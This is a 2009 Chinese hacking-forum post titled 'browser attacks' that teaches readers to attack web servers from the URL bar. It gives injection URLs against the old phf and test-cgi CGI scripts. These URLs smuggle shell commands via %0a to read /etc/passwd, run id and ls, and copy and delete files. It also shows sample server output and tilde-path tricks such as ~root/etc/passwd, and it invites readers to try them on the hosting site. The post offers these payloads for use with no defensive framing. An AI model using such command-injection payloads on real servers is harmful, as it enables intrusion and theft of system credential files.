注册
登录
论坛
搜索
插件
默认风格
默认风格_6hOY
D Dark
greenwall
jeans
fashion
私人消息 (0)
公共消息 (0)
论坛任务 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
【3.A.S.T】网络安全爱好者
»
初入江湖
» 浏览器攻击
返回列表
发帖
虚竹
发短消息
加为好友
虚竹
当前离线
UID
1223
帖子
300
精华
0
积分
762
威望
1212
金钱
1030
阅读权限
70
在线时间
3 小时
注册时间
2008-7-16
最后登录
2009-4-9
3.A.S.T少校
帖子
300
积分
762
威望
1212
金钱
1030
在线时间
3 小时
1
楼
跳转到
»
倒序看帖
打印
字体大小:
t
T
发表于 2009-1-24 17:33
|
只看该作者
浏览器攻击
浏览器
,
攻击
浏览器攻击
浏览器攻击
在本章我将讲述一些利用浏览器来进行攻击的方法
1。大家都知道了phf攻击了,phf是cgi script,很多站点都有这个大漏洞啦,使用
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
指令可以拿到那个站点的passwd.但还有些更好的执行方法呦如:
http://thegnome.com/cgi-bin/phf? ... Qemail=&Qnickna
me=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf? ... ;Qalias=&Qname=
haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf? ... 0%7Esomeuser/passwd
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd
http://thegnome.com/cgi-bin/phf? ... p;Qalias=&Qname
=haqr&Qemail=&Qnickname=&Qoffice_phone=
上面执行的命令是
id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
rm ~someuser/passwd
2。有关test攻击
http://thegnome.com/cgi-bin/test-cgi?
whatever
服务器会应答,本服务器的一些情况如:
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
好吧,让我们来点赶兴趣的
http://thegnome.com/cgi-bin/test-cgi?
help&0a/bin/cat%20/etc/passwd
3。~的应用
~主要是用在很多的个人主页上的快捷目录的方法,如果我们使用这样的~
http://thegnome.com/~root
http://thegnome.com/~root/etc/passwd
不是在任何平台上都通过呦,在BSD Apache上曾经成功过,当然还可以试试~bin ,~etc,~uucp.....
看到这个站点了吗,本站所在的这个站点就是用这种形式的,如果我们打入 本站所在的web地址/~bin
出现了什么,你看到了吗?然后...............注意请不要破坏
收藏
分享
返回列表
【 新 手 入 门 】
初入江湖
有问必答
软件交流
程序设计
黑客播报
操作系统
Windows专区
Unix 专区
【 技 术 交 流 】
原创专区
QQ技巧
反黑知识
网站建设
教程发布
技术交流
免杀技术
0day发布
专题归类
私服技术
【 论 坛 水 区 】
被黑站点
激情灌水
极品贴图
开心乐园
影音专区
广告专区
【 论 坛 管 理 】
新人报到
论坛管理
勋章申请
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
全国地图
@@@ 加入本站会员 一个月月赚1200+的秘密@@@
发表于 2009-1-24 17:33
| 